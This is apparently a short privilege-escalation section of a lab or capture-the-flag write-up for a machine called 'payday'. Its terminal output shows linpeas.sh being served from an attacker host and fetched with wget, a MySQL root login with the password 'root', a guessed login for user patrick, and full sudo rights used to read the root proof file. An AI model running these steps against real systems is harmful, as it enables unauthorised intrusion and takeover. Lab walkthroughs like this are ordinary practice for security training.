Priv Esc

$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
www-data@payday:/dev/shm$ wget 192.168.45.233/linpeas.sh
--21:40:03--  http://192.168.45.233/linpeas.sh
           => `linpeas.sh'
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860,335 (840K) [text/x-sh]

100%[====================================>] 860,335      563.87K/s             

21:40:04 (562.51 KB/s) - `linpeas.sh' saved [860335/860335]

www-data@payday:/dev/shm$ chmod +x linpeas.sh
www-data@payday:/dev/shm$ mysql -u root -p
Enter password: root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.0.45-Debian_1ubuntu3-log Debian etch distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> 

MySQL had nothing.

patrick:patrick
patrick@payday:/dev/shm$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL
patrick@payday:/dev/shm$ sudo -i
root@payday:~# whoami && cat /root/proof.txt && ip a
root
5c2448a2a217c820d72a51cb80502ec7
1: lo: <LOOPBACK,UP,10000> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:bf:12:f9 brd ff:ff:ff:ff:ff:ff
    inet 192.168.217.39/24 brd 192.168.217.255 scope global eth0
    inet6 fe80::250:56ff:febf:12f9/64 scope link 
       valid_lft forever preferred_lft forever
